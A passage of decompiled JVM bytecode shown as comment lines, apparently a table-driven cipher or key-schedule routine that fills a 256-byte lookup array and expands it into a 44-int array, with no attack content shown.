  2784.     //   2932: bipush 96
  2785.     //   2934: ldc_w 284
  2786.     //   2937: bastore
  2787.     //   2938: dup
  2788.     //   2939: bipush 97
  2789.     //   2941: ldc_w 296
  2790.     //   2944: bastore
  2791.     //   2945: dup
  2792.     //   2946: bipush 98
  2793.     //   2948: ldc_w 421
  2794.     //   2951: bastore
  2795.     //   2952: dup
  2796.     //   2953: bipush 99
  2797.     //   2955: ldc_w 325
  2798.     //   2958: bastore
  2799.     //   2959: dup
  2800.     //   2960: bipush 100
  2801.     //   2962: ldc_w 312
  2802.     //   2965: bastore
  2803.     //   2966: dup
  2804.     //   2967: bipush 101
  2805.     //   2969: ldc_w 372
  2806.     //   2972: bastore
  2807.     //   2973: dup
  2808.     //   2974: bipush 102
  2809.     //   2976: ldc_w 444
  2810.     //   2979: bastore
  2811.     //   2980: dup
  2812.     //   2981: bipush 103
  2813.     //   2983: ldc_w 445
  2814.     //   2986: bastore
  2815.     //   2987: dup
  2816.     //   2988: bipush 104
  2817.     //   2990: ldc_w 364
  2818.     //   2993: bastore
  2819.     //   2994: dup
  2820.     //   2995: bipush 105
  2821.     //   2997: ldc_w 273
  2822.     //   3000: bastore
  2823.     //   3001: dup
  2824.     //   3002: bipush 106
  2825.     //   3004: ldc_w 364
  2826.     //   3007: bastore
  2827.     //   3008: dup
  2828.     //   3009: bipush 107
  2829.     //   3011: ldc_w 387
  2830.     //   3014: bastore
  2831.     //   3015: dup
  2832.     //   3016: bipush 108
  2833.     //   3018: ldc_w 399
  2834.     //   3021: bastore
  2835.     //   3022: dup
  2836.     //   3023: bipush 109
  2837.     //   3025: ldc_w 446
  2838.     //   3028: bastore
  2839.     //   3029: dup
  2840.     //   3030: bipush 110
  2841.     //   3032: ldc_w 416
  2842.     //   3035: bastore
  2843.     //   3036: dup
  2844.     //   3037: bipush 111
  2845.     //   3039: ldc_w 267
  2846.     //   3042: bastore
  2847.     //   3043: dup
  2848.     //   3044: bipush 112
  2849.     //   3046: ldc_w 278
  2850.     //   3049: bastore
  2851.     //   3050: dup
  2852.     //   3051: bipush 113
  2853.     //   3053: ldc_w 447
  2854.     //   3056: bastore
  2855.     //   3057: dup
  2856.     //   3058: bipush 114
  2857.     //   3060: ldc_w 355
  2858.     //   3063: bastore
  2859.     //   3064: dup
  2860.     //   3065: bipush 115
  2861.     //   3067: ldc_w 428
  2862.     //   3070: bastore
  2863.     //   3071: dup
  2864.     //   3072: bipush 116
  2865.     //   3074: ldc_w 448
  2866.     //   3077: bastore
  2867.     //   3078: dup
  2868.     //   3079: bipush 117
  2869.     //   3081: ldc_w 282
  2870.     //   3084: bastore
  2871.     //   3085: dup
  2872.     //   3086: bipush 118
  2873.     //   3088: ldc_w 405
  2874.     //   3091: bastore
  2875.     //   3092: dup
  2876.     //   3093: bipush 119
  2877.     //   3095: ldc_w 321
  2878.     //   3098: bastore
  2879.     //   3099: dup
  2880.     //   3100: bipush 120
  2881.     //   3102: ldc_w 346
  2882.     //   3105: bastore
  2883.     //   3106: dup
  2884.     //   3107: bipush 121
  2885.     //   3109: ldc_w 329
  2886.     //   3112: bastore
  2887.     //   3113: dup
  2888.     //   3114: bipush 122
  2889.     //   3116: ldc_w 351
  2890.     //   3119: bastore
  2891.     //   3120: dup
  2892.     //   3121: bipush 123
  2893.     //   3123: ldc_w 449
  2894.     //   3126: bastore
  2895.     //   3127: dup
  2896.     //   3128: bipush 124
  2897.     //   3130: ldc_w 438
  2898.     //   3133: bastore
  2899.     //   3134: dup
  2900.     //   3135: bipush 125
  2901.     //   3137: ldc_w 417
  2902.     //   3140: bastore
  2903.     //   3141: dup
  2904.     //   3142: bipush 126
  2905.     //   3144: ldc_w 433
  2906.     //   3147: bastore
  2907.     //   3148: dup
  2908.     //   3149: bipush 127
  2909.     //   3151: ldc_w 281
  2910.     //   3154: bastore
  2911.     //   3155: dup
  2912.     //   3156: sipush 128
  2913.     //   3159: ldc_w 393
  2914.     //   3162: bastore
  2915.     //   3163: dup
  2916.     //   3164: sipush 129
  2917.     //   3167: ldc_w 283
  2918.     //   3170: bastore
  2919.     //   3171: dup
  2920.     //   3172: sipush 130
  2921.     //   3175: ldc_w 439
  2922.     //   3178: bastore
  2923.     //   3179: dup
  2924.     //   3180: sipush 131
  2925.     //   3183: ldc_w 401
  2926.     //   3186: bastore
  2927.     //   3187: dup
  2928.     //   3188: sipush 132
  2929.     //   3191: ldc_w 293
  2930.     //   3194: bastore
  2931.     //   3195: dup
  2932.     //   3196: sipush 133
  2933.     //   3199: ldc_w 432
  2934.     //   3202: bastore
  2935.     //   3203: dup
  2936.     //   3204: sipush 134
  2937.     //   3207: ldc_w 325
  2938.     //   3210: bastore
  2939.     //   3211: dup
  2940.     //   3212: sipush 135
  2941.     //   3215: ldc_w 311
  2942.     //   3218: bastore
  2943.     //   3219: dup
  2944.     //   3220: sipush 136
  2945.     //   3223: ldc_w 411
  2946.     //   3226: bastore
  2947.     //   3227: dup
  2948.     //   3228: sipush 137
  2949.     //   3231: ldc_w 266
  2950.     //   3234: bastore
  2951.     //   3235: dup
  2952.     //   3236: sipush 138
  2953.     //   3239: ldc_w 450
  2954.     //   3242: bastore
  2955.     //   3243: dup
  2956.     //   3244: sipush 139
  2957.     //   3247: ldc_w 451
  2958.     //   3250: bastore
  2959.     //   3251: dup
  2960.     //   3252: sipush 140
  2961.     //   3255: ldc_w 450
  2962.     //   3258: bastore
  2963.     //   3259: dup
  2964.     //   3260: sipush 141
  2965.     //   3263: ldc_w 452
  2966.     //   3266: bastore
  2967.     //   3267: dup
  2968.     //   3268: sipush 142
  2969.     //   3271: ldc_w 453
  2970.     //   3274: bastore
  2971.     //   3275: dup
  2972.     //   3276: sipush 143
  2973.     //   3279: ldc_w 454
  2974.     //   3282: bastore
  2975.     //   3283: dup
  2976.     //   3284: sipush 144
  2977.     //   3287: ldc_w 324
  2978.     //   3290: bastore
  2979.     //   3291: dup
  2980.     //   3292: sipush 145
  2981.     //   3295: ldc_w 436
  2982.     //   3298: bastore
  2983.     //   3299: dup
  2984.     //   3300: sipush 146
  2985.     //   3303: ldc_w 287
  2986.     //   3306: bastore
  2987.     //   3307: dup
  2988.     //   3308: sipush 147
  2989.     //   3311: ldc_w 451
  2990.     //   3314: bastore
  2991.     //   3315: dup
  2992.     //   3316: sipush 148
  2993.     //   3319: ldc_w 389
  2994.     //   3322: bastore
  2995.     //   3323: dup
  2996.     //   3324: sipush 149
  2997.     //   3327: ldc_w 455
  2998.     //   3330: bastore
  2999.     //   3331: dup
  3000.     //   3332: sipush 150
  3001.     //   3335: ldc_w 456
  3002.     //   3338: bastore
  3003.     //   3339: dup
  3004.     //   3340: sipush 151
  3005.     //   3343: ldc_w 352
  3006.     //   3346: bastore
  3007.     //   3347: dup
  3008.     //   3348: sipush 152
  3009.     //   3351: ldc_w 429
  3010.     //   3354: bastore
  3011.     //   3355: dup
  3012.     //   3356: sipush 153
  3013.     //   3359: ldc_w 265
  3014.     //   3362: bastore
  3015.     //   3363: dup
  3016.     //   3364: sipush 154
  3017.     //   3367: ldc_w 333
  3018.     //   3370: bastore
  3019.     //   3371: dup
  3020.     //   3372: sipush 155
  3021.     //   3375: ldc_w 403
  3022.     //   3378: bastore
  3023.     //   3379: dup
  3024.     //   3380: sipush 156
  3025.     //   3383: ldc_w 446
  3026.     //   3386: bastore
  3027.     //   3387: dup
  3028.     //   3388: sipush 157
  3029.     //   3391: ldc_w 339
  3030.     //   3394: bastore
  3031.     //   3395: dup
  3032.     //   3396: sipush 158
  3033.     //   3399: ldc_w 383
  3034.     //   3402: bastore
  3035.     //   3403: dup
  3036.     //   3404: sipush 159
  3037.     //   3407: ldc_w 457
  3038.     //   3410: bastore
  3039.     //   3411: dup
  3040.     //   3412: sipush 160
  3041.     //   3415: ldc_w 444
  3042.     //   3418: bastore
  3043.     //   3419: dup
  3044.     //   3420: sipush 161
  3045.     //   3423: ldc_w 400
  3046.     //   3426: bastore
  3047.     //   3427: dup
  3048.     //   3428: sipush 162
  3049.     //   3431: ldc_w 458
  3050.     //   3434: bastore
  3051.     //   3435: dup
  3052.     //   3436: sipush 163
  3053.     //   3439: ldc_w 418
  3054.     //   3442: bastore
  3055.     //   3443: dup
  3056.     //   3444: sipush 164
  3057.     //   3447: ldc_w 293
  3058.     //   3450: bastore
  3059.     //   3451: dup
  3060.     //   3452: sipush 165
  3061.     //   3455: ldc_w 288
  3062.     //   3458: bastore
  3063.     //   3459: dup
  3064.     //   3460: sipush 166
  3065.     //   3463: ldc_w 447
  3066.     //   3466: bastore
  3067.     //   3467: dup
  3068.     //   3468: sipush 167
  3069.     //   3471: ldc_w 401
  3070.     //   3474: bastore
  3071.     //   3475: dup
  3072.     //   3476: sipush 168
  3073.     //   3479: ldc_w 410
  3074.     //   3482: bastore
  3075.     //   3483: dup
  3076.     //   3484: sipush 169
  3077.     //   3487: ldc_w 290
  3078.     //   3490: bastore
  3079.     //   3491: dup
  3080.     //   3492: sipush 170
  3081.     //   3495: ldc_w 459
  3082.     //   3498: bastore
  3083.     //   3499: dup
  3084.     //   3500: sipush 171
  3085.     //   3503: ldc_w 349
  3086.     //   3506: bastore
  3087.     //   3507: dup
  3088.     //   3508: sipush 172
  3089.     //   3511: ldc_w 322
  3090.     //   3514: bastore
  3091.     //   3515: dup
  3092.     //   3516: sipush 173
  3093.     //   3519: ldc_w 361
  3094.     //   3522: bastore
  3095.     //   3523: dup
  3096.     //   3524: sipush 174
  3097.     //   3527: ldc_w 274
  3098.     //   3530: bastore
  3099.     //   3531: dup
  3100.     //   3532: sipush 175
  3101.     //   3535: ldc_w 460
  3102.     //   3538: bastore
  3103.     //   3539: dup
  3104.     //   3540: sipush 176
  3105.     //   3543: ldc_w 323
  3106.     //   3546: bastore
  3107.     //   3547: dup
  3108.     //   3548: sipush 177
  3109.     //   3551: ldc_w 306
  3110.     //   3554: bastore
  3111.     //   3555: dup
  3112.     //   3556: sipush 178
  3113.     //   3559: ldc_w 332
  3114.     //   3562: bastore
  3115.     //   3563: dup
  3116.     //   3564: sipush 179
  3117.     //   3567: ldc_w 359
  3118.     //   3570: bastore
  3119.     //   3571: dup
  3120.     //   3572: sipush 180
  3121.     //   3575: ldc_w 431
  3122.     //   3578: bastore
  3123.     //   3579: dup
  3124.     //   3580: sipush 181
  3125.     //   3583: ldc_w 461
  3126.     //   3586: bastore
  3127.     //   3587: dup
  3128.     //   3588: sipush 182
  3129.     //   3591: ldc_w 462
  3130.     //   3594: bastore
  3131.     //   3595: dup
  3132.     //   3596: sipush 183
  3133.     //   3599: ldc_w 260
  3134.     //   3602: bastore
  3135.     //   3603: dup
  3136.     //   3604: sipush 184
  3137.     //   3607: ldc_w 360
  3138.     //   3610: bastore
  3139.     //   3611: dup
  3140.     //   3612: sipush 185
  3141.     //   3615: ldc_w 301
  3142.     //   3618: bastore
  3143.     //   3619: dup
  3144.     //   3620: sipush 186
  3145.     //   3623: ldc_w 333
  3146.     //   3626: bastore
  3147.     //   3627: dup
  3148.     //   3628: sipush 187
  3149.     //   3631: ldc_w 315
  3150.     //   3634: bastore
  3151.     //   3635: dup
  3152.     //   3636: sipush 188
  3153.     //   3639: ldc_w 394
  3154.     //   3642: bastore
  3155.     //   3643: dup
  3156.     //   3644: sipush 189
  3157.     //   3647: ldc_w 308
  3158.     //   3650: bastore
  3159.     //   3651: dup
  3160.     //   3652: sipush 190
  3161.     //   3655: ldc_w 460
  3162.     //   3658: bastore
  3163.     //   3659: dup
  3164.     //   3660: sipush 191
  3165.     //   3663: ldc_w 257
  3166.     //   3666: bastore
  3167.     //   3667: dup
  3168.     //   3668: sipush 192
  3169.     //   3671: ldc_w 295
  3170.     //   3674: bastore
  3171.     //   3675: dup
  3172.     //   3676: sipush 193
  3173.     //   3679: ldc_w 452
  3174.     //   3682: bastore
  3175.     //   3683: dup
  3176.     //   3684: sipush 194
  3177.     //   3687: ldc_w 417
  3178.     //   3690: bastore
  3179.     //   3691: dup
  3180.     //   3692: sipush 195
  3181.     //   3695: ldc_w 463
  3182.     //   3698: bastore
  3183.     //   3699: dup
  3184.     //   3700: sipush 196
  3185.     //   3703: ldc_w 464
  3186.     //   3706: bastore
  3187.     //   3707: dup
  3188.     //   3708: sipush 197
  3189.     //   3711: ldc_w 375
  3190.     //   3714: bastore
  3191.     //   3715: dup
  3192.     //   3716: sipush 198
  3193.     //   3719: ldc_w 296
  3194.     //   3722: bastore
  3195.     //   3723: dup
  3196.     //   3724: sipush 199
  3197.     //   3727: ldc_w 316
  3198.     //   3730: bastore
  3199.     //   3731: dup
  3200.     //   3732: sipush 200
  3201.     //   3735: ldc_w 454
  3202.     //   3738: bastore
  3203.     //   3739: dup
  3204.     //   3740: sipush 201
  3205.     //   3743: ldc_w 344
  3206.     //   3746: bastore
  3207.     //   3747: dup
  3208.     //   3748: sipush 202
  3209.     //   3751: ldc_w 433
  3210.     //   3754: bastore
  3211.     //   3755: dup
  3212.     //   3756: sipush 203
  3213.     //   3759: ldc_w 397
  3214.     //   3762: bastore
  3215.     //   3763: dup
  3216.     //   3764: sipush 204
  3217.     //   3767: ldc_w 340
  3218.     //   3770: bastore
  3219.     //   3771: dup
  3220.     //   3772: sipush 205
  3221.     //   3775: ldc_w 411
  3222.     //   3778: bastore
  3223.     //   3779: dup
  3224.     //   3780: sipush 206
  3225.     //   3783: ldc_w 465
  3226.     //   3786: bastore
  3227.     //   3787: dup
  3228.     //   3788: sipush 207
  3229.     //   3791: ldc_w 466
  3230.     //   3794: bastore
  3231.     //   3795: dup
  3232.     //   3796: sipush 208
  3233.     //   3799: ldc_w 467
  3234.     //   3802: bastore
  3235.     //   3803: dup
  3236.     //   3804: sipush 209
  3237.     //   3807: ldc_w 339
  3238.     //   3810: bastore
  3239.     //   3811: dup
  3240.     //   3812: sipush 210
  3241.     //   3815: ldc_w 418
  3242.     //   3818: bastore
  3243.     //   3819: dup
  3244.     //   3820: sipush 211
  3245.     //   3823: ldc_w 426
  3246.     //   3826: bastore
  3247.     //   3827: dup
  3248.     //   3828: sipush 212
  3249.     //   3831: ldc_w 358
  3250.     //   3834: bastore
  3251.     //   3835: dup
  3252.     //   3836: sipush 213
  3253.     //   3839: ldc_w 468
  3254.     //   3842: bastore
  3255.     //   3843: dup
  3256.     //   3844: sipush 214
  3257.     //   3847: ldc_w 269
  3258.     //   3850: bastore
  3259.     //   3851: dup
  3260.     //   3852: sipush 215
  3261.     //   3855: ldc_w 469
  3262.     //   3858: bastore
  3263.     //   3859: dup
  3264.     //   3860: sipush 216
  3265.     //   3863: ldc_w 358
  3266.     //   3866: bastore
  3267.     //   3867: dup
  3268.     //   3868: sipush 217
  3269.     //   3871: ldc_w 266
  3270.     //   3874: bastore
  3271.     //   3875: dup
  3272.     //   3876: sipush 218
  3273.     //   3879: ldc_w 258
  3274.     //   3882: bastore
  3275.     //   3883: dup
  3276.     //   3884: sipush 219
  3277.     //   3887: ldc_w 256
  3278.     //   3890: bastore
  3279.     //   3891: dup
  3280.     //   3892: sipush 220
  3281.     //   3895: ldc_w 406
  3282.     //   3898: bastore
  3283.     //   3899: dup
  3284.     //   3900: sipush 221
  3285.     //   3903: ldc_w 470
  3286.     //   3906: bastore
  3287.     //   3907: dup
  3288.     //   3908: sipush 222
  3289.     //   3911: ldc_w 460
  3290.     //   3914: bastore
  3291.     //   3915: dup
  3292.     //   3916: sipush 223
  3293.     //   3919: ldc_w 306
  3294.     //   3922: bastore
  3295.     //   3923: dup
  3296.     //   3924: sipush 224
  3297.     //   3927: ldc_w 274
  3298.     //   3930: bastore
  3299.     //   3931: dup
  3300.     //   3932: sipush 225
  3301.     //   3935: ldc_w 471
  3302.     //   3938: bastore
  3303.     //   3939: dup
  3304.     //   3940: sipush 226
  3305.     //   3943: ldc_w 379
  3306.     //   3946: bastore
  3307.     //   3947: dup
  3308.     //   3948: sipush 227
  3309.     //   3951: ldc_w 472
  3310.     //   3954: bastore
  3311.     //   3955: dup
  3312.     //   3956: sipush 228
  3313.     //   3959: ldc_w 423
  3314.     //   3962: bastore
  3315.     //   3963: dup
  3316.     //   3964: sipush 229
  3317.     //   3967: ldc_w 473
  3318.     //   3970: bastore
  3319.     //   3971: dup
  3320.     //   3972: sipush 230
  3321.     //   3975: ldc_w 382
  3322.     //   3978: bastore
  3323.     //   3979: dup
  3324.     //   3980: sipush 231
  3325.     //   3983: ldc_w 338
  3326.     //   3986: bastore
  3327.     //   3987: dup
  3328.     //   3988: sipush 232
  3329.     //   3991: ldc_w 366
  3330.     //   3994: bastore
  3331.     //   3995: dup
  3332.     //   3996: sipush 233
  3333.     //   3999: ldc_w 474
  3334.     //   4002: bastore
  3335.     //   4003: dup
  3336.     //   4004: sipush 234
  3337.     //   4007: ldc_w 475
  3338.     //   4010: bastore
  3339.     //   4011: dup
  3340.     //   4012: sipush 235
  3341.     //   4015: ldc_w 476
  3342.     //   4018: bastore
  3343.     //   4019: dup
  3344.     //   4020: sipush 236
  3345.     //   4023: ldc_w 477
  3346.     //   4026: bastore
  3347.     //   4027: dup
  3348.     //   4028: sipush 237
  3349.     //   4031: ldc_w 392
  3350.     //   4034: bastore
  3351.     //   4035: dup
  3352.     //   4036: sipush 238
  3353.     //   4039: ldc_w 357
  3354.     //   4042: bastore
  3355.     //   4043: dup
  3356.     //   4044: sipush 239
  3357.     //   4047: ldc_w 256
  3358.     //   4050: bastore
  3359.     //   4051: dup
  3360.     //   4052: sipush 240
  3361.     //   4055: ldc_w 367
  3362.     //   4058: bastore
  3363.     //   4059: dup
  3364.     //   4060: sipush 241
  3365.     //   4063: ldc_w 340
  3366.     //   4066: bastore
  3367.     //   4067: dup
  3368.     //   4068: sipush 242
  3369.     //   4071: ldc_w 333
  3370.     //   4074: bastore
  3371.     //   4075: dup
  3372.     //   4076: sipush 243
  3373.     //   4079: ldc_w 478
  3374.     //   4082: bastore
  3375.     //   4083: dup
  3376.     //   4084: sipush 244
  3377.     //   4087: ldc_w 430
  3378.     //   4090: bastore
  3379.     //   4091: dup
  3380.     //   4092: sipush 245
  3381.     //   4095: ldc_w 375
  3382.     //   4098: bastore
  3383.     //   4099: dup
  3384.     //   4100: sipush 246
  3385.     //   4103: ldc_w 479
  3386.     //   4106: bastore
  3387.     //   4107: dup
  3388.     //   4108: sipush 247
  3389.     //   4111: ldc_w 356
  3390.     //   4114: bastore
  3391.     //   4115: dup
  3392.     //   4116: sipush 248
  3393.     //   4119: ldc_w 427
  3394.     //   4122: bastore
  3395.     //   4123: dup
  3396.     //   4124: sipush 249
  3397.     //   4127: ldc_w 374
  3398.     //   4130: bastore
  3399.     //   4131: dup
  3400.     //   4132: sipush 250
  3401.     //   4135: ldc_w 480
  3402.     //   4138: bastore
  3403.     //   4139: dup
  3404.     //   4140: sipush 251
  3405.     //   4143: ldc_w 307
  3406.     //   4146: bastore
  3407.     //   4147: dup
  3408.     //   4148: sipush 252
  3409.     //   4151: ldc_w 451
  3410.     //   4154: bastore
  3411.     //   4155: dup
  3412.     //   4156: sipush 253
  3413.     //   4159: ldc_w 264
  3414.     //   4162: bastore
  3415.     //   4163: dup
  3416.     //   4164: sipush 254
  3417.     //   4167: ldc_w 481
  3418.     //   4170: bastore
  3419.     //   4171: dup
  3420.     //   4172: sipush 255
  3421.     //   4175: ldc_w 392
  3422.     //   4178: bastore
  3423.     //   4179: astore 12
  3424.     //   4181: iconst_0
  3425.     //   4182: istore 13
  3426.     //   4184: iload 13
  3427.     //   4186: ifne +400 -> 4586
  3428.     //   4189: iinc 13 1
  3429.     //   4192: aload 10
  3430.     //   4194: iconst_0
  3431.     //   4195: aload 11
  3432.     //   4197: sipush 255
  3433.     //   4200: aload 12
  3434.     //   4202: sipush 249
  3435.     //   4205: baload
  3436.     //   4206: iand
  3437.     //   4207: baload
  3438.     //   4208: bastore
  3439.     //   4209: aload 10
  3440.     //   4211: iconst_1
  3441.     //   4212: aload 11
  3442.     //   4214: sipush 255
  3443.     //   4217: aload 12
  3444.     //   4219: bipush 90
  3445.     //   4221: baload
  3446.     //   4222: iand
  3447.     //   4223: baload
  3448.     //   4224: bastore
  3449.     //   4225: aload 10
  3450.     //   4227: iconst_2
  3451.     //   4228: aload 11
  3452.     //   4230: sipush 255
  3453.     //   4233: aload 12
  3454.     //   4235: sipush 202
  3455.     //   4238: baload
  3456.     //   4239: iand
  3457.     //   4240: baload
  3458.     //   4241: bastore
  3459.     //   4242: aload 10
  3460.     //   4244: iconst_3
  3461.     //   4245: aload 11
  3462.     //   4247: sipush 255
  3463.     //   4250: aload 12
  3464.     //   4252: sipush 153
  3465.     //   4255: baload
  3466.     //   4256: iand
  3467.     //   4257: baload
  3468.     //   4258: bastore
  3469.     //   4259: aload 10
  3470.     //   4261: iconst_4
  3471.     //   4262: aload 11
  3472.     //   4264: sipush 255
  3473.     //   4267: aload 12
  3474.     //   4269: bipush 78
  3475.     //   4271: baload
  3476.     //   4272: iand
  3477.     //   4273: baload
  3478.     //   4274: bastore
  3479.     //   4275: aload 10
  3480.     //   4277: iconst_5
  3481.     //   4278: aload 11
  3482.     //   4280: sipush 255
  3483.     //   4283: aload 12
  3484.     //   4285: sipush 236
  3485.     //   4288: baload
  3486.     //   4289: iand
  3487.     //   4290: baload
  3488.     //   4291: bastore
  3489.     //   4292: aload 10
  3490.     //   4294: bipush 6
  3491.     //   4296: aload 11
  3492.     //   4298: sipush 255
  3493.     //   4301: aload 12
  3494.     //   4303: bipush 34
  3495.     //   4305: baload
  3496.     //   4306: iand
  3497.     //   4307: baload
  3498.     //   4308: bastore
  3499.     //   4309: aload 10
  3500.     //   4311: bipush 7
  3501.     //   4313: aload 11
  3502.     //   4315: sipush 255
  3503.     //   4318: aload 12
  3504.     //   4320: sipush 198
  3505.     //   4323: baload
  3506.     //   4324: iand
  3507.     //   4325: baload
  3508.     //   4326: bastore
  3509.     //   4327: aload 10
  3510.     //   4329: bipush 8
  3511.     //   4331: aload 11
  3512.     //   4333: sipush 255
  3513.     //   4336: aload 12
  3514.     //   4338: bipush 12
  3515.     //   4340: baload
  3516.     //   4341: iand
  3517.     //   4342: baload
  3518.     //   4343: bastore
  3519.     //   4344: aload 10
  3520.     //   4346: bipush 9
  3521.     //   4348: aload 11
  3522.     //   4350: sipush 255
  3523.     //   4353: aload 12
  3524.     //   4355: bipush 95
  3525.     //   4357: baload
  3526.     //   4358: iand
  3527.     //   4359: baload
  3528.     //   4360: bastore
  3529.     //   4361: aload 10
  3530.     //   4363: bipush 10
  3531.     //   4365: aload 11
  3532.     //   4367: sipush 255
  3533.     //   4370: aload 12
  3534.     //   4372: bipush 60
  3535.     //   4374: baload
  3536.     //   4375: iand
  3537.     //   4376: baload
  3538.     //   4377: bastore
  3539.     //   4378: aload 10
  3540.     //   4380: bipush 11
  3541.     //   4382: aload 11
  3542.     //   4384: sipush 255
  3543.     //   4387: aload 12
  3544.     //   4389: bipush 96
  3545.     //   4391: baload
  3546.     //   4392: iand
  3547.     //   4393: baload
  3548.     //   4394: bastore
  3549.     //   4395: aload 10
  3550.     //   4397: bipush 12
  3551.     //   4399: aload 11
  3552.     //   4401: sipush 255
  3553.     //   4404: aload 12
  3554.     //   4406: sipush 227
  3555.     //   4409: baload
  3556.     //   4410: iand
  3557.     //   4411: baload
  3558.     //   4412: bastore
  3559.     //   4413: aload 10
  3560.     //   4415: bipush 13
  3561.     //   4417: aload 11
  3562.     //   4419: sipush 255
  3563.     //   4422: aload 12
  3564.     //   4424: sipush 169
  3565.     //   4427: baload
  3566.     //   4428: iand
  3567.     //   4429: baload
  3568.     //   4430: bastore
  3569.     //   4431: aload 10
  3570.     //   4433: bipush 14
  3571.     //   4435: aload 11
  3572.     //   4437: sipush 255
  3573.     //   4440: aload 12
  3574.     //   4442: bipush 127
  3575.     //   4444: baload
  3576.     //   4445: iand
  3577.     //   4446: baload
  3578.     //   4447: bastore
  3579.     //   4448: aload 10
  3580.     //   4450: bipush 15
  3581.     //   4452: aload 11
  3582.     //   4454: sipush 255
  3583.     //   4457: aload 12
  3584.     //   4459: bipush 79
  3585.     //   4461: baload
  3586.     //   4462: iand
  3587.     //   4463: baload
  3588.     //   4464: bastore
  3589.     //   4465: bipush 44
  3590.     //   4467: newarray int
  3591.     //   4469: astore 14
  3592.     //   4471: iconst_0
  3593.     //   4472: istore 15
  3594.     //   4474: iload 15
  3595.     //   4476: ifne +499 -> 4975
  3596.     //   4479: iload 15
  3597.     //   4481: iconst_3
  3598.     //   4482: iadd
  3599.     //   4483: istore 27
  3600.     //   4485: iconst_0
  3601.     //   4486: istore 28
  3602.     //   4488: iconst_0
  3603.     //   4489: istore 29
  3604.     //   4491: iconst_0
  3605.     //   4492: istore 30
  3606.     //   4494: iload 30
  3607.     //   4496: ifne +374 -> 4870
  3608.     //   4499: iinc 30 3
  3609.     //   4502: iload 29
  3610.     //   4504: bipush 16
  3611.     //   4506: if_icmpge +364 -> 4870
  3612.     //   4509: iconst_3
  3613.     //   4510: iload 28
  3614.     //   4512: iconst_4
  3615.     //   4513: iload 28
  3616.     //   4515: iconst_2
  3617.     //   4516: ishr
  3618.     //   4517: imul
  3619.     //   4518: iadd
  3620.     //   4519: iand
  3621.     //   4520: istore 35
  3622.     //   4522: aload 14
  3623.     //   4524: iload 35
  3624.     //   4526: sipush 255
  3625.     //   4529: aload 10
  3626.     //   4531: iload 29
  3627.     //   4533: baload
  3628.     //   4534: iand
  3629.     //   4535: sipush 255
  3630.     //   4538: aload 10
  3631.     //   4540: iload 29
  3632.     //   4542: iconst_1
  3633.     //   4543: iadd
  3634.     //   4544: baload
  3635.     //   4545: iand
  3636.     //   4546: bipush 8
  3637.     //   4548: ishl
  3638.     //   4549: ior
  3639.     //   4550: sipush 255
  3640.     //   4553: aload 10
  3641.     //   4555: iload 29
  3642.     //   4557: iconst_2
  3643.     //   4558: iadd
  3644.     //   4559: baload
  3645.     //   4560: iand
  3646.     //   4561: bipush 16
  3647.     //   4563: ishl
  3648.     //   4564: ior
  3649.     //   4565: aload 10
  3650.     //   4567: iload 29
  3651.     //   4569: iconst_3
  3652.     //   4570: iadd
  3653.     //   4571: baload
  3654.     //   4572: bipush 24
  3655.     //   4574: ishl
  3656.     //   4575: ior
  3657.     //   4576: iastore
  3658.     //   4577: iinc 29 4
  3659.     //   4580: iinc 28 1
  3660.     //   4583: goto -92 -> 4491
  3661.     //   4586: aload 10
  3662.     //   4588: bipush 8
  3663.     //   4590: aload 11
  3664.     //   4592: sipush 255
  3665.     //   4595: aload 12
  3666.     //   4597: bipush 12
  3667.     //   4599: baload
  3668.     //   4600: iand
  3669.     //   4601: baload
  3670.     //   4602: bastore
  3671.     //   4603: aload 10
  3672.     //   4605: bipush 9
  3673.     //   4607: aload 11
  3674.     //   4609: sipush 255
  3675.     //   4612: aload 12
  3676.     //   4614: bipush 95
  3677.     //   4616: baload
  3678.     //   4617: iand
  3679.     //   4618: baload
  3680.     //   4619: bastore
  3681.     //   4620: aload 10
  3682.     //   4622: bipush 10
  3683.     //   4624: aload 11
  3684.     //   4626: sipush 255
  3685.     //   4629: aload 12
  3686.     //   4631: bipush 60
  3687.     //   4633: baload
  3688.     //   4634: iand
  3689.     //   4635: baload
  3690.     //   4636: bastore
  3691.     //   4637: aload 10
  3692.     //   4639: bipush 11
  3693.     //   4641: aload 11
  3694.     //   4643: sipush 255
  3695.     //   4646: aload 12
  3696.     //   4648: bipush 96
  3697.     //   4650: baload
  3698.     //   4651: iand
  3699.     //   4652: baload
  3700.     //   4653: bastore
  3701.     //   4654: aload 10
  3702.     //   4656: bipush 12
  3703.     //   4658: aload 11
  3704.     //   4660: sipush 255
  3705.     //   4663: aload 12
  3706.     //   4665: sipush 227
  3707.     //   4668: baload
  3708.     //   4669: iand
  3709.     //   4670: baload
  3710.     //   4671: bastore
  3711.     //   4672: aload 10
  3712.     //   4674: bipush 13
  3713.     //   4676: aload 11
  3714.     //   4678: sipush 255
  3715.     //   4681: aload 12
  3716.     //   4683: sipush 169
  3717.     //   4686: baload
  3718.     //   4687: iand
  3719.     //   4688: baload
  3720.     //   4689: bastore
  3721.     //   4690: aload 10
  3722.     //   4692: bipush 14
  3723.     //   4694: aload 11
  3724.     //   4696: sipush 255
  3725.     //   4699: aload 12
  3726.     //   4701: bipush 127
  3727.     //   4703: baload
  3728.     //   4704: iand
  3729.     //   4705: baload
  3730.     //   4706: bastore
  3731.     //   4707: aload 10
  3732.     //   4709: bipush 15
  3733.     //   4711: aload 11
  3734.     //   4713: sipush 255
  3735.     //   4716: aload 12
  3736.     //   4718: bipush 79
  3737.     //   4720: baload
  3738.     //   4721: iand
  3739.     //   4722: baload
  3740.     //   4723: bastore
  3741.     //   4724: goto -259 -> 4465
  3742.     //   4727: astore 38
  3743.     //   4729: aload 10
  3744.     //   4731: bipush 8
  3745.     //   4733: aload 11
  3746.     //   4735: sipush 255
  3747.     //   4738: aload 12
  3748.     //   4740: bipush 12
  3749.     //   4742: baload
  3750.     //   4743: iand
  3751.     //   4744: baload
  3752.     //   4745: bastore
  3753.     //   4746: aload 10
  3754.     //   4748: bipush 9
  3755.     //   4750: aload 11
  3756.     //   4752: sipush 255
  3757.     //   4755: aload 12
  3758.     //   4757: bipush 95
  3759.     //   4759: baload
  3760.     //   4760: iand
  3761.     //   4761: baload
  3762.     //   4762: bastore
  3763.     //   4763: aload 10
  3764.     //   4765: bipush 10
  3765.     //   4767: aload 11
  3766.     //   4769: sipush 255
  3767.     //   4772: aload 12
  3768.     //   4774: bipush 60
  3769.     //   4776: baload
  3770.     //   4777: iand
  3771.     //   4778: baload
  3772.     //   4779: bastore
  3773.     //   4780: aload 10
  3774.     //   4782: bipush 11
  3775.     //   4784: aload 11
  3776.     //   4786: sipush 255
